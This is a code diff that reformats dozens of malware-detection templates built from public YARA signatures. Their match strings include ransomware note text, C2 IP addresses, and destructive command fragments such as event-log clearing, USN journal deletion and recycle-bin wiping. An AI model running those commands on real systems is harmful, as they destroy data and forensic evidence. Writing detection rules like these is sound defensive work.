a/file/malware/fudcrypt-malware.yaml +++ b/file/malware/fudcrypt-malware.yaml @@ -8,11 +8,9 @@ info: - https://github.com/gigajew/FudCrypt/ - https://github.com/Yara-Rules/rules/blob/master/malware/MALW_FUDCrypt.yar tags: malware,file - file: - extensions: - all - matchers: - type: word part: raw @@ -28,4 +26,4 @@ file: - 'MkhMoOHCbGUMqtnRDJKnBYnOj' - 'sHEqLMGglkBAOIUfcSAgMvZfs' - 'JtZApJhbFAIFxzHLjjyEQvtgd' - - 'IIQrSWZEMmoQIKGuxxwoTwXka' \ No newline at end of file + - 'IIQrSWZEMmoQIKGuxxwoTwXka' diff --git a/file/malware/gafgyt-bash-malware.yaml b/file/malware/gafgyt-bash-malware.yaml index 89b33c0f3d..0121957c1e 100644 --- a/file/malware/gafgyt-bash-malware.yaml +++ b/file/malware/gafgyt-bash-malware.yaml @@ -6,11 +6,9 @@ info: severity: info reference: https://github.com/Yara-Rules/rules/blob/master/malware/MALW_Gafgyt.yar tags: malware,file - file: - extensions: - all - matchers: - type: word part: raw @@ -19,4 +17,4 @@ file: - 'GETLOCALIP' - 'HTTPFLOOD' - 'LUCKYLILDUDE' - condition: and \ No newline at end of file + condition: and diff --git a/file/malware/gafgyt-generic-malware.yaml b/file/malware/gafgyt-generic-malware.yaml index 0f1cf80b47..a544c033e8 100644 --- a/file/malware/gafgyt-generic-malware.yaml +++ b/file/malware/gafgyt-generic-malware.yaml @@ -6,11 +6,9 @@ info: severity: info reference: https://github.com/Yara-Rules/rules/blob/master/malware/MALW_Gafgyt.yar tags: malware,file - file: - extensions: - all - matchers: - type: word part: raw @@ -19,4 +17,4 @@ file: - '/proc/net/route' - 'admin' - 'root' - condition: and \ No newline at end of file + condition: and diff --git a/file/malware/gafgyt-hihi-malware.yaml b/file/malware/gafgyt-hihi-malware.yaml index 61375a18ac..24bdf93069 100644 --- a/file/malware/gafgyt-hihi-malware.yaml +++ b/file/malware/gafgyt-hihi-malware.yaml @@ -6,11 +6,9 @@ info: severity: info reference: https://github.com/Yara-Rules/rules/blob/master/malware/MALW_Gafgyt.yar tags: malware,file - file: - extensions: - all - matchers: - type: word part: raw @@ -21,4 +19,4 @@ file: - 'ADVANCEDBOT' - '46.166.185.92' - 'LOLNOGTFO' - condition: and \ No newline at end of file + condition: and diff --git a/file/malware/gafgyt-hoho-malware.yaml b/file/malware/gafgyt-hoho-malware.yaml index f41ce24284..9cbcbbee7e 100644 --- a/file/malware/gafgyt-hoho-malware.yaml +++ b/file/malware/gafgyt-hoho-malware.yaml @@ -6,11 +6,9 @@ info: severity: info reference: https://github.com/Yara-Rules/rules/blob/master/malware/MALW_Gafgyt.yar tags: malware,file - file: - extensions: - all - matchers: - type: word part: raw @@ -19,4 +17,4 @@ file: - 'PRIVMSG' - 'Remote IRC Bot' - '23.95.43.182' - condition: and \ No newline at end of file + condition: and diff --git a/file/malware/gafgyt-jackmy-malware.yaml b/file/malware/gafgyt-jackmy-malware.yaml index 5db0722050..a65a6897c2 100644 --- a/file/malware/gafgyt-jackmy-malware.yaml +++ b/file/malware/gafgyt-jackmy-malware.yaml @@ -6,11 +6,9 @@ info: severity: info reference: https://github.com/Yara-Rules/rules/blob/master/malware/MALW_Gafgyt.yar tags: malware,file - file: - extensions: - all - matchers: - type: word part: raw @@ -19,4 +17,4 @@ file: - 'PONG' - 'jackmy' - '203.134.%d.%d' - condition: and \ No newline at end of file + condition: and diff --git a/file/malware/gafgyt-oh-malware.yaml b/file/malware/gafgyt-oh-malware.yaml index 1fbc949209..9aa3c91cab 100644 --- a/file/malware/gafgyt-oh-malware.yaml +++ b/file/malware/gafgyt-oh-malware.yaml @@ -6,11 +6,9 @@ info: severity: info reference: https://github.com/Yara-Rules/rules/blob/master/malware/MALW_Gafgyt.yar tags: malware,file - file: - extensions: - all - matchers: - type: word part: raw @@ -19,4 +17,4 @@ file: - 'BOGOMIPS' - '124.105.97.%d' - 'fucknet' - condition: and \ No newline at end of file + condition: and diff --git a/file/malware/genome-malware.yaml b/file/malware/genome-malware.yaml index 4d2f018030..421208f83b 100644 --- a/file/malware/genome-malware.yaml +++ b/file/malware/genome-malware.yaml @@ -6,11 +6,9 @@ info: severity: info reference: https://github.com/Yara-Rules/rules/blob/master/malware/MALW_Genome.yar tags: malware,file - file: - extensions: - all - matchers: - type: word part: raw @@ -18,4 +16,4 @@ file: - 'Attempting to create more than one keyboard::Monitor instance' - '{Right windows}' - 'Access violation - no RTTI data!' - condition: and \ No newline at end of file + condition: and diff --git a/file/malware/glass-malware.yaml b/file/malware/glass-malware.yaml index 4729c20f2d..bcbee1c80b 100644 --- a/file/malware/glass-malware.yaml +++ b/file/malware/glass-malware.yaml @@ -6,11 +6,9 @@ info: severity: info reference: https://github.com/Yara-Rules/rules/blob/master/malware/RAT_Glass.yar tags: malware,file - file: - extensions: - all - matchers: - type: word part: raw diff --git a/file/malware/glasses-malware.yaml b/file/malware/glasses-malware.yaml index 9dd8240a7d..e623f5a2c6 100644 --- a/file/malware/glasses-malware.yaml +++ b/file/malware/glasses-malware.yaml @@ -8,7 +8,6 @@ info: - https://citizenlab.ca/2013/02/apt1s-glasses-watching-a-human-rights-organization/ - https://github.com/Yara-Rules/rules/blob/master/malware/MALW_Glasses.yar tags: malware,file - file: - extensions: - all @@ -27,4 +26,4 @@ file: binary: - "B8ABAAAAAAF7E1D1EA8D04522BC8" - "B856555555F7E98B4C241C8BC2C1E81F03D0493BCA" - condition: or \ No newline at end of file + condition: or diff --git a/file/malware/gozi-malware.yaml b/file/malware/gozi-malware.yaml index 0de45dd78e..84c7ded956 100644 --- a/file/malware/gozi-malware.yaml +++ b/file/malware/gozi-malware.yaml @@ -8,12 +8,10 @@ info: - https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos.html - https://github.com/Yara-Rules/rules/blob/master/malware/MALW_Gozi.yar tags: malware,file - file: - extensions: - all - matchers: - type: binary binary: - - "63006F006F006B006900650073002E00730071006C006900740065002D006A006F00750072006E0061006C0000004F504552412E45584500" \ No newline at end of file + - "63006F006F006B006900650073002E00730071006C006900740065002D006A006F00750072006E0061006C0000004F504552412E45584500" diff --git a/file/malware/gpgqwerty-malware.yaml b/file/malware/gpgqwerty-malware.yaml index 98fc738eda..de8af17020 100644 --- a/file/malware/gpgqwerty-malware.yaml +++ b/file/malware/gpgqwerty-malware.yaml @@ -6,11 +6,9 @@ info: severity: info reference: https://github.com/Yara-Rules/rules/blob/master/malware/RANSOM_GPGQwerty.yar tags: malware,file - file: - extensions: - all - matchers: - type: word part: raw @@ -19,4 +17,4 @@ file: - "%s%s.%d.qwerty" - "del /Q /F /S %s$recycle.bin" - "cryz1@protonmail.com" - condition: and \ No newline at end of file + condition: and diff --git a/file/malware/greame-malware.yaml b/file/malware/greame-malware.yaml index c87fb4e61f..ad3611e4e5 100644 --- a/file/malware/greame-malware.yaml +++ b/file/malware/greame-malware.yaml @@ -6,7 +6,6 @@ info: severity: info reference: https://github.com/Yara-Rules/rules/blob/master/malware/RAT_Ratdecoders.yar tags: malware,file - file: - extensions: - all @@ -28,4 +27,4 @@ file: binary: - "232323234023232323E8EEE9F9232323234023232323" - "232323234023232323FAFDF0EFF9232323234023232323" - condition: and \ No newline at end of file + condition: and diff --git a/file/malware/grozlex-malware.yaml b/file/malware/grozlex-malware.yaml index 86893d6184..50a7b9bae0 100644 --- a/file/malware/grozlex-malware.yaml +++ b/file/malware/grozlex-malware.yaml @@ -8,12 +8,10 @@ info: - https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos.html - https://github.com/Yara-Rules/rules/blob/master/malware/MALW_Grozlex.yar tags: malware,file - file: - extensions: - all - matchers: - type: binary binary: - - "4C006F00670073002000610074007400610063006800650064002000620079002000690043006F007A0065006E" \ No newline at end of file + - "4C006F00670073002000610074007400610063006800650064002000620079002000690043006F007A0065006E" diff --git a/file/malware/hawkeye-malware.yaml b/file/malware/hawkeye-malware.yaml index 734d77c765..027ac473c5 100644 --- a/file/malware/hawkeye-malware.yaml +++ b/file/malware/hawkeye-malware.yaml @@ -6,11 +6,9 @@ info: severity: info reference: https://github.com/Yara-Rules/rules/blob/master/malware/RAT_Ratdecoders.yar tags: malware,file - file: - extensions: - all - matchers: - type: word part: raw diff --git a/file/malware/hydracrypt-malware.yaml b/file/malware/hydracrypt-malware.yaml index 638cba9046..f0385df1bb 100644 --- a/file/malware/hydracrypt-malware.yaml +++ b/file/malware/hydracrypt-malware.yaml @@ -6,11 +6,9 @@ info: severity: info reference: https://github.com/airbnb/binaryalert/blob/master/rules/public/ransomware/windows/ransomware_windows_hydracrypt.yara tags: malware,file,hydracrypt - file: - extensions: - all - matchers: - type: word part: raw @@ -20,4 +18,4 @@ file: - "Play \"sound.wav\"" - "&Start Recording" - "7About record" - condition: and \ No newline at end of file + condition: and diff --git a/file/malware/imminent-malware.yaml b/file/malware/imminent-malware.yaml index e093fb86f8..0ea69beb84 100644 --- a/file/malware/imminent-malware.yaml +++ b/file/malware/imminent-malware.yaml @@ -6,7 +6,6 @@ info: severity: info reference: https://github.com/Yara-Rules/rules/blob/master/malware/RAT_Ratdecoders.yar tags: malware,file - file: - extensions: - all @@ -34,4 +33,4 @@ file: - "england.png" - "-CHECK & PING -n 2 127.0.0.1 & EXIT" - "Showed Messagebox" - condition: and \ No newline at end of file + condition: and diff --git a/file/malware/infinity-malware.yaml b/file/malware/infinity-malware.yaml index e831343139..0cdf2da835 100644 --- a/file/malware/infinity-malware.yaml +++ b/file/malware/infinity-malware.yaml @@ -6,11 +6,9 @@ info: severity: info reference: https://github.com/Yara-Rules/rules/blob/master/malware/RAT_Ratdecoders.yar tags: malware,file - file: - extensions: - all - matchers: - type: word part: raw @@ -23,4 +21,4 @@ file: - "BATScripting" - "FBqINhRdpgnqATxJ.html" - "magic_key" - condition: and \ No newline at end of file + condition: and diff --git a/file/malware/insta11-malware.yaml b/file/malware/insta11-malware.yaml index 97870e5da4..3f665e73db 100644 --- a/file/malware/insta11-malware.yaml +++ b/file/malware/insta11-malware.yaml @@ -6,7 +6,6 @@ info: severity: info reference: https://github.com/Yara-Rules/rules/blob/master/malware/MALW_Install11.yar tags: malware,file - file: - extensions: - all @@ -25,4 +24,4 @@ file: - type: binary binary: - - 'E9000000006823040000' \ No newline at end of file + - 'E9000000006823040000' diff --git a/file/malware/intel-virtualization-malware.yaml b/file/malware/intel-virtualization-malware.yaml index 650f218f8f..00af81409a 100644 --- a/file/malware/intel-virtualization-malware.yaml +++ b/file/malware/intel-virtualization-malware.yaml @@ -6,7 +6,6 @@ info: severity: info reference: https://github.com/Yara-Rules/rules/blob/master/malware/MALW_Intel_Virtualization.yar tags: malware,file - file: - extensions: - all @@ -26,4 +25,4 @@ file: binary: - '483A5C466173745C506C756728686B636D64295C' - '646C6C5C52656C656173655C48696A61636B446C6C2E706462' - condition: and \ No newline at end of file + condition: and diff --git a/file/malware/iotreaper-malware.yaml b/file/malware/iotreaper-malware.yaml index d64ea0d220..808c73e5ae 100644 --- a/file/malware/iotreaper-malware.yaml +++ b/file/malware/iotreaper-malware.yaml @@ -6,7 +6,6 @@ info: severity: info reference: https://github.com/Yara-Rules/rules/blob/master/malware/MALW_IotReaper.yar tags: malware,file - file: - extensions: - all @@ -25,4 +24,4 @@ file: - type: binary binary: - - 'E9000000006823040000' \ No newline at end of file + - 'E9000000006823040000' diff --git a/file/malware/linux-aesddos-malware.yaml b/file/malware/linux-aesddos-malware.yaml index 389b681e8b..e8ff28a39c 100644 --- a/file/malware/linux-aesddos-malware.yaml +++ b/file/malware/linux-aesddos-malware.yaml @@ -8,7 +8,6 @@ info: - https://github.com/Yara-Rules/rules/blob/master/malware/MALW_Miscelanea_Linux.yar - http://www.kernelmode.info/forum/viewtopic.php?f=16&t=3483 tags: malware,file - file: - extensions: - all diff --git a/file/malware/linux-billgates-malware.yaml b/file/malware/linux-billgates-malware.yaml index 24ec63d673..8f0f579254 100644 --- a/file/malware/linux-billgates-malware.yaml +++ b/file/malware/linux-billgates-malware.yaml @@ -8,11 +8,9 @@ info: - https://github.com/Yara-Rules/rules/blob/master/malware/MALW_Miscelanea_Linux.yar - http://www.kernelmode.info/forum/viewtopic.php?f=16&t=3429 tags: malware,file - file: - extensions: - all - matchers: - type: word part: raw diff --git a/file/malware/linux-elknot-malware.yaml b/file/malware/linux-elknot-malware.yaml index 2a4e11bb7a..b08653eba9 100644 --- a/file/malware/linux-elknot-malware.yaml +++ b/file/malware/linux-elknot-malware.yaml @@ -8,11 +8,9 @@ info: - https://github.com/Yara-Rules/rules/blob/master/malware/MALW_Miscelanea_Linux.yar - http://www.kernelmode.info/forum/viewtopic.php?f=16&t=3099 tags: malware,file - file: - extensions: - all - matchers: - type: word part: raw diff --git a/file/malware/linux-mrblack-malware.yaml b/file/malware/linux-mrblack-malware.yaml index 6b67dda9f9..3fe8828d4a 100644 --- a/file/malware/linux-mrblack-malware.yaml +++ b/file/malware/linux-mrblack-malware.yaml @@ -8,11 +8,9 @@ info: - https://github.com/Yara-Rules/rules/blob/master/malware/MALW_Miscelanea_Linux.yar - http://www.kernelmode.info/forum/viewtopic.php?f=16&t=3483 tags: malware,file - file: - extensions: - all - matchers: - type: word part: raw diff --git a/file/malware/linux-tsunami-malware.yaml b/file/malware/linux-tsunami-malware.yaml index 2f89e2327e..cc92f32ceb 100644 --- a/file/malware/linux-tsunami-malware.yaml +++ b/file/malware/linux-tsunami-malware.yaml @@ -8,11 +8,9 @@ info: - https://github.com/Yara-Rules/rules/blob/master/malware/MALW_Miscelanea_Linux.yar - http://www.kernelmode.info/forum/viewtopic.php?f=16&t=3483 tags: malware,file - file: - extensions: - all - matchers: - type: word part: raw diff --git a/file/malware/locky-malware.yaml b/file/malware/locky-malware.yaml index 248e653c88..538da1c7ff 100644 --- a/file/malware/locky-malware.yaml +++ b/file/malware/locky-malware.yaml @@ -6,7 +6,6 @@ info: severity: info reference: https://github.com/Yara-Rules/rules/blob/master/malware/RANSOM_Locky.yar tags: malware,file - file: - extensions: - all @@ -28,4 +27,4 @@ file: - "720075006300740069006F006E" - "0073002E0074007800740000" - "536F6674776172655C4C6F636B7900" - condition: and \ No newline at end of file + condition: and diff --git a/file/malware/lostdoor-malware.yaml b/file/malware/lostdoor-malware.yaml index e68a90d5b2..985c248941 100644 --- a/file/malware/lostdoor-malware.yaml +++ b/file/malware/lostdoor-malware.yaml @@ -6,7 +6,6 @@ info: severity: info reference: https://github.com/Yara-Rules/rules/blob/master/malware/RAT_Ratdecoders.yar tags: malware,file - file: - extensions: - all @@ -29,4 +28,4 @@ file: - type: binary binary: - - "0D0A2A454449545F5345525645522A0D0A" \ No newline at end of file + - "0D0A2A454449545F5345525645522A0D0A" diff --git a/file/malware/luminositylink-malware.yaml b/file/malware/luminositylink-malware.yaml index f3076fb6af..21a780c49f 100644 --- a/file/malware/luminositylink-malware.yaml +++ b/file/malware/luminositylink-malware.yaml @@ -6,11 +6,9 @@ info: severity: info reference: https://github.com/Yara-Rules/rules/blob/master/malware/RAT_Ratdecoders.yar tags: malware,file - file: - extensions: - all - matchers: - type: word part: raw @@ -26,4 +24,4 @@ file: - "Luminosity" - "LuminosityCryptoMiner" - "MANAGER*CLIENTDETAILS*" - condition: and \ No newline at end of file + condition: and diff --git a/file/malware/luxnet-malware.yaml b/file/malware/luxnet-malware.yaml index 4fca112cf0..a3a393a13b 100644 --- a/file/malware/luxnet-malware.yaml +++ b/file/malware/luxnet-malware.yaml @@ -6,11 +6,9 @@ info: severity: info reference: https://github.com/Yara-Rules/rules/blob/master/malware/RAT_Ratdecoders.yar tags: malware,file - file: - extensions: - all - matchers: - type: word part: raw @@ -21,4 +19,4 @@ file: - "op_Equality" - "dickcursor.cur" - "{0}|{1}|{2}" - condition: and \ No newline at end of file + condition: and diff --git a/file/malware/macgyver-installer-malware.yaml b/file/malware/macgyver-installer-malware.yaml index ddad8de9c5..2691b2e0ad 100644 --- a/file/malware/macgyver-installer-malware.yaml +++ b/file/malware/macgyver-installer-malware.yaml @@ -8,11 +8,9 @@ info: - https://github.com/fboldewin/MacGyver-s-return---An-EMV-Chip-cloning-case/blob/master/MacGyver's%20return%20-%20An%20EMV%20Chip%20cloning%20case.pdf - https://github.com/Yara-Rules/rules/blob/master/malware/MALW_MacGyver.yar tags: malware,file - file: - extensions: - all - matchers: - type: word part: raw @@ -21,4 +19,4 @@ file: - "install -file MacGyver.cap -nvDataLimit 1000 -instParam 00 -priv 4" - "-mac_key 404142434445464748494a4b4c4d4e4f" - "-enc_key 404142434445464748494a4b4c4d4e4f" - condition: and \ No newline at end of file + condition: and diff --git a/file/malware/macgyver-malware.yaml b/file/malware/macgyver-malware.yaml index c56023d78b..feb3faacbf 100644 --- a/file/malware/macgyver-malware.yaml +++ b/file/malware/macgyver-malware.yaml @@ -8,11 +8,9 @@ info: - https://github.com/fboldewin/MacGyver-s-return---An-EMV-Chip-cloning-case/blob/master/MacGyver's%20return%20-%20An%20EMV%20Chip%20cloning%20case.pdf - https://github.com/Yara-Rules/rules/blob/master/malware/MALW_MacGyver.yar tags: malware,file - file: - extensions: - all - matchers: - type: word part: raw @@ -24,4 +22,4 @@ file: - "src/MacGyver/javacard/ConstantPool.cap" - "src/MacGyver/javacard/Class.cap" - "src/MacGyver/javacard/Method.cap" - condition: and \ No newline at end of file + condition: and diff --git a/file/malware/macos-bella-malware.yaml b/file/malware/macos-bella-malware.yaml index 2615f5c49c..e5aa899549 100644 --- a/file/malware/macos-bella-malware.yaml +++ b/file/malware/macos-bella-malware.yaml @@ -6,7 +6,6 @@ info: severity: info reference: https://github.com/airbnb/binaryalert/blob/master/rules/public/malware/macos/malware_macos_bella.yara tags: malware,file,macos-bella - file: - extensions: - all @@ -35,4 +34,4 @@ file: words: - "Please specify a bella server." - "What port should Bella connect on [Default is 4545]:" - condition: and \ No newline at end of file + condition: and diff --git a/file/malware/miner--malware.yaml b/file/malware/miner--malware.yaml index 50884f91ce..fe77cd9a01 100644 --- a/file/malware/miner--malware.yaml +++ b/file/malware/miner--malware.yaml @@ -6,14 +6,12 @@ info: severity: info reference: https://github.com/Yara-Rules/rules/blob/master/malware/MALW_XMRIG_Miner.yar tags: malware,file - file: - extensions: - all - matchers: - type: word part: raw words: - "stratum+tcp" - - "stratum+udp" \ No newline at end of file + - "stratum+udp" diff --git a/file/malware/miniasp3-malware.yaml b/file/malware/miniasp3-malware.yaml index 318b0f6d90..954dc7c7b1 100644 --- a/file/malware/miniasp3-malware.yaml +++ b/file/malware/miniasp3-malware.yaml @@ -6,7 +6,6 @@ info: severity: info reference: https://github.com/Yara-Rules/rules/blob/master/malware/MALW_MiniAsp3_mem.yar tags: malware,file - file: - extensions: - all diff --git a/file/malware/naikon-malware.yaml b/file/malware/naikon-malware.yaml index bd0ac87b0d..312effddf9 100644 --- a/file/malware/naikon-malware.yaml +++ b/file/malware/naikon-malware.yaml @@ -6,7 +6,6 @@ info: severity: info reference: https://github.com/Yara-Rules/rules/blob/master/malware/MALW_Naikon.yar tags: malware,file - file: - extensions: - all diff --git a/file/malware/naspyupdate-malware.yaml b/file/malware/naspyupdate-malware.yaml index 3ac092de7c..06e38bce49 100644 --- a/file/malware/naspyupdate-malware.yaml +++ b/file/malware/naspyupdate-malware.yaml @@ -6,7 +6,6 @@ info: severity: info reference: https://github.com/Yara-Rules/rules/blob/master/malware/MALW_Naspyupdate.yar tags: malware,file - file: - extensions: - all @@ -23,5 +22,5 @@ file: - "\\httpclient.txt" - "password <=14" - "/%ldn.txt" - - "Kill You\x00" + - "Kill You\0" condition: or diff --git a/file/malware/notepad-malware.yaml b/file/malware/notepad-malware.yaml index 6d4880f8f2..89075ffa2a 100644 --- a/file/malware/notepad-malware.yaml +++ b/file/malware/notepad-malware.yaml @@ -6,14 +6,12 @@ info: severity: info reference: https://github.com/Yara-Rules/rules/blob/master/malware/MALW_Notepad.yar tags: malware,file - file: - extensions: - all - matchers: - type: word part: raw words: - "75BAA77C842BE168B0F66C42C7885997" - - "B523F63566F407F3834BCC54AAA32524" \ No newline at end of file + - "B523F63566F407F3834BCC54AAA32524" diff --git a/file/malware/olyx-malware.yaml b/file/malware/olyx-malware.yaml index 8bfb443752..028c421062 100644 --- a/file/malware/olyx-malware.yaml +++ b/file/malware/olyx-malware.yaml @@ -6,7 +6,6 @@ info: severity: info reference: https://github.com/Yara-Rules/rules/blob/master/malware/MALW_Olyx.yar tags: malware,file - file: - extensions: - all diff --git a/file/malware/osx-leverage-malware.yaml b/file/malware/osx-leverage-malware.yaml index 47ca40521b..1a01534e05 100644 --- a/file/malware/osx-leverage-malware.yaml +++ b/file/malware/osx-leverage-malware.yaml @@ -6,11 +6,9 @@ info: severity: info reference: https://github.com/Yara-Rules/rules/blob/master/malware/MALW_OSX_Leverage.yar tags: malware,file - file: - extensions: - all - matchers: - type: word part: raw @@ -21,5 +19,5 @@ file: - "osascript -e 'tell application \"System Events\" to get the hidden of every login item'" - "osascript -e 'tell application \"System Events\" to get the name of every login item'" - "osascript -e 'tell application \"System Events\" to get the path of every login item'" - - "serverVisible \x00" - condition: and \ No newline at end of file + - "serverVisible \0" + condition: and diff --git a/file/malware/paradox-malware.yaml b/file/malware/paradox-malware.yaml index a1e868b53b..3e7326f3d0 100644 --- a/file/malware/paradox-malware.yaml +++ b/file/malware/paradox-malware.yaml @@ -6,11 +6,9 @@ info: severity: info reference: https://github.com/Yara-Rules/rules/blob/master/malware/RAT_Ratdecoders.yar tags: malware,file - file: - extensions: - all - matchers: - type: word part: raw @@ -22,4 +20,4 @@ file: - "SlowLaris" - "SHITEMID" - "set_Remote_Chat" - condition: and \ No newline at end of file + condition: and diff --git a/file/malware/petya-malware-variant-1.yaml b/file/malware/petya-malware-variant-1.yaml index 3e04bf74f4..6929efa7b6 100644 --- a/file/malware/petya-malware-variant-1.yaml +++ b/file/malware/petya-malware-variant-1.yaml @@ -6,11 +6,9 @@ info: severity: info reference: https://github.com/airbnb/binaryalert/blob/master/rules/public/ransomware/windows/ransomware_windows_petya_variant_1.yara tags: malware,file,petya - file: - extensions: - all - matchers: - type: word part: raw @@ -21,4 +19,4 @@ file: - "Send $300 worth of Bitcoin to following address:" - "have been encrypted. Perhaps you are busy looking for a way to recover your" - "need to do is submit the payment and purchase the decryption key." - condition: or \ No newline at end of file + condition: or diff --git a/file/malware/petya-malware-variant-3.yaml b/file/malware/petya-malware-variant-3.yaml index 2408013fc0..c6da0e51cf 100644 --- a/file/malware/petya-malware-variant-3.yaml +++ b/file/malware/petya-malware-variant-3.yaml @@ -6,15 +6,13 @@ info: severity: info reference: https://github.com/airbnb/binaryalert/blob/master/rules/public/ransomware/windows/ransomware_windows_petya_variant_3.yara tags: malware,file,petya - file: - extensions: - all - matchers: - type: word part: raw words: - "wevtutil cl Setup & wevtutil cl System" - "fsutil usn deletejournal /D %c:" - condition: or \ No newline at end of file + condition: or diff --git a/file/malware/petya-malware-variant-bitcoin.yaml b/file/malware/petya-malware-variant-bitcoin.yaml index 1feb76d099..5e5b06f4b3 100644 --- a/file/malware/petya-malware-variant-bitcoin.yaml +++ b/file/malware/petya-malware-variant-bitcoin.yaml @@ -6,13 +6,11 @@ info: severity: info reference: https://github.com/airbnb/binaryalert/blob/master/rules/public/ransomware/windows/ransomware_windows_petya_variant_bitcoin.yara tags: malware,file,petya - file: - extensions: - all - matchers: - type: word part: raw words: - - "MIIBCgKCAQEAxP/VqKc0yLe9JhVqFMQGwUITO6WpXWnKSNQAYT0O65Cr8PjIQInTeHkXEjfO2n2JmURWV/uHB0ZrlQ/wcYJBwLhQ9EqJ3iDqmN19Oo7NtyEUmbYmopcq+YLIBZzQ2ZTK0A2DtX4GRKxEEFLCy7vP12EYOPXknVy/+mf0JFWixz29QiTf5oLu15wVLONCuEibGaNNpgq+CXsPwfITDbDDmdrRIiUEUw6o3pt5pNOskfOJbMan2TZu6zfhzuts7KafP5UA8/0Hmf5K3/F9Mf9SE68EZjK+cIiFlKeWndP0XfRCYXI9AJYCeaOu7CXF6U0AVNnNjvLeOn42LHFUK4o6JwIDAQAB" \ No newline at end of file + - "MIIBCgKCAQEAxP/VqKc0yLe9JhVqFMQGwUITO6WpXWnKSNQAYT0O65Cr8PjIQInTeHkXEjfO2n2JmURWV/uHB0ZrlQ/wcYJBwLhQ9EqJ3iDqmN19Oo7NtyEUmbYmopcq+YLIBZzQ2ZTK0A2DtX4GRKxEEFLCy7vP12EYOPXknVy/+mf0JFWixz29QiTf5oLu15wVLONCuEibGaNNpgq+CXsPwfITDbDDmdrRIiUEUw6o3pt5pNOskfOJbMan2TZu6zfhzuts7KafP5UA8/0Hmf5K3/F9Mf9SE68EZjK+cIiFlKeWndP0XfRCYXI9AJYCeaOu7CXF6U0AVNnNjvLeOn42LHFUK4o6JwIDAQAB" diff --git a/file/malware/plasma-malware.yaml b/file/malware/plasma-malware.yaml index f777e38f46..ac4be89cab 100644 --- a/file/malware/plasma-malware.yaml +++ b/file/malware/plasma-malware.yaml @@ -6,11 +6,9 @@ info: severity: info reference: https://github.com/Yara-Rules/rules/blob/master/malware/RAT_Ratdecoders.yar tags: malware,file - file: - extensions: - all - matchers: - type: word part: raw @@ -24,4 +22,4 @@ file: - "Proactive Bot Killer Enabled!" - "PlasmaRAT" - "AntiEverything" - condition: and \ No newline at end of file + condition: and diff --git a/file/malware/poetrat-malware.yaml b/file/malware/poetrat-malware.yaml index bdc0827515..3ee1b0b4a3 100644 --- a/file/malware/poetrat-malware.yaml +++ b/file/malware/poetrat-malware.yaml @@ -6,7 +6,6 @@ info: severity: info reference: https://github.com/Yara-Rules/rules/blob/master/malware/RAT_PoetRATDoc.yar tags: malware,file - file: - extensions: - all @@ -31,4 +30,4 @@ file: regex: - '(\.py$|\.pyc$|\.pyd$|Python)' - '\.dll' - condition: and \ No newline at end of file + condition: and diff --git a/file/malware/pony-malware.yaml b/file/malware/pony-malware.yaml index f919ab5a80..e07b2d3201 100644 --- a/file/malware/pony-malware.yaml +++ b/file/malware/pony-malware.yaml @@ -6,11 +6,9 @@ info: severity: info reference: https://github.com/Yara-Rules/rules/blob/master/malware/MALW_Pony.yar tags: malware,file - file: - extensions: - all - matchers: - type: word part: raw @@ -19,4 +17,4 @@ file: - "YUIPWDFILE0YUIPKDFILE0YUICRYPTED0YUI1.0" - "POST %s HTTP/1.0" - "Accept-Encoding: identity, *;q=0" - condition: and \ No newline at end of file + condition: and diff --git a/file/malware/pony-stealer-malware.yaml b/file/malware/pony-stealer-malware.yaml index ebf29cdec2..a8f9972501 100644 --- a/file/malware/pony-stealer-malware.yaml +++ b/file/malware/pony-stealer-malware.yaml @@ -6,11 +6,9 @@ info: severity: info reference: https://github.com/airbnb/binaryalert/blob/master/rules/public/malware/windows/malware_windows_pony_stealer.yara tags: malware,file,pony,stealer - file: - extensions: - all - matchers: - type: word part: raw @@ -26,4 +24,4 @@ file: - "BulletProof" - "CuteFTP" condition: and - case-insensitive: true \ No newline at end of file + case-insensitive: true diff --git a/file/malware/powerware-malware.yaml b/file/malware/powerware-malware.yaml index 7ca2ea34a1..7ff5e5f785 100644 --- a/file/malware/powerware-malware.yaml +++ b/file/malware/powerware-malware.yaml @@ -6,11 +6,9 @@ info: severity: info reference: https://github.com/airbnb/binaryalert/blob/master/rules/public/ransomware/windows/ransomware_windows_powerware_locky.yara tags: malware,file,powerware - file: - extensions: - all - matchers: - type: word part: raw @@ -18,4 +16,4 @@ file: - "ScriptRunner.dll" - "ScriptRunner.pdb" - "fixed.ps1" - condition: and \ No newline at end of file + condition: and diff --git a/file/malware/pubsab-malware.yaml b/file/malware/pubsab-malware.yaml index ade33db854..4ab39e0a23 100644 --- a/file/malware/pubsab-malware.yaml +++ b/file/malware/pubsab-malware.yaml @@ -6,7 +6,6 @@ info: severity: info reference: https://github.com/Yara-Rules/rules/blob/master/malware/MALW_PubSab.yar tags: malware,file - file: - extensions: - all @@ -23,4 +22,4 @@ file: - type: binary binary: - - "6B45E43789CA29C28955E4" \ No newline at end of file + - "6B45E43789CA29C28955E4" diff --git a/file/malware/punisher-malware.yaml b/file/malware/punisher-malware.yaml index 45b9c0c608..0eb2e1ef6d 100644 --- a/file/malware/punisher-malware.yaml +++ b/file/malware/punisher-malware.yaml @@ -6,7 +6,6 @@ info: severity: info reference: https://github.com/Yara-Rules/rules/blob/master/malware/RAT_Ratdecoders.yar tags: malware,file - file: - extensions: - all @@ -27,4 +26,4 @@ file: binary: - "5C006800660068002E007600620073" - "5C00730063002E007600620073" - condition: and \ No newline at end of file + condition: and diff --git a/file/malware/pypi-malware.yaml b/file/malware/pypi-malware.yaml index a03e0c6773..58d4272bf4 100644 --- a/file/malware/pypi-malware.yaml +++ b/file/malware/pypi-malware.yaml @@ -8,11 +8,9 @@ info: - http://www.nbu.gov.sk/skcsirt-sa-20170909-pypi/ - https://github.com/Yara-Rules/rules/blob/master/malware/MALW_PyPI.yar tags: malware,file - file: - extensions: - all - matchers: - type: word part: raw @@ -20,4 +18,4 @@ file: - "# Welcome Here! :)" - "# just toy, no harm :)" - "[0x76,0x21,0xfe,0xcc,0xee]" - condition: and \ No newline at end of file + condition: and diff --git a/file/malware/pythorat-malware.yaml b/file/malware/pythorat-malware.yaml index e5fb6642a4..6a4daefd31 100644 --- a/file/malware/pythorat-malware.yaml +++ b/file/malware/pythorat-malware.yaml @@ -6,11 +6,9 @@ info: severity: info reference: https://github.com/Yara-Rules/rules/blob/master/malware/RAT_Ratdecoders.yar tags: malware,file - file: - extensions: - all - matchers: - type: word part: raw diff --git a/file/malware/qrat-malware.yaml b/file/malware/qrat-malware.yaml index 76853066d2..1ed76ea61d 100644 --- a/file/malware/qrat-malware.yaml +++ 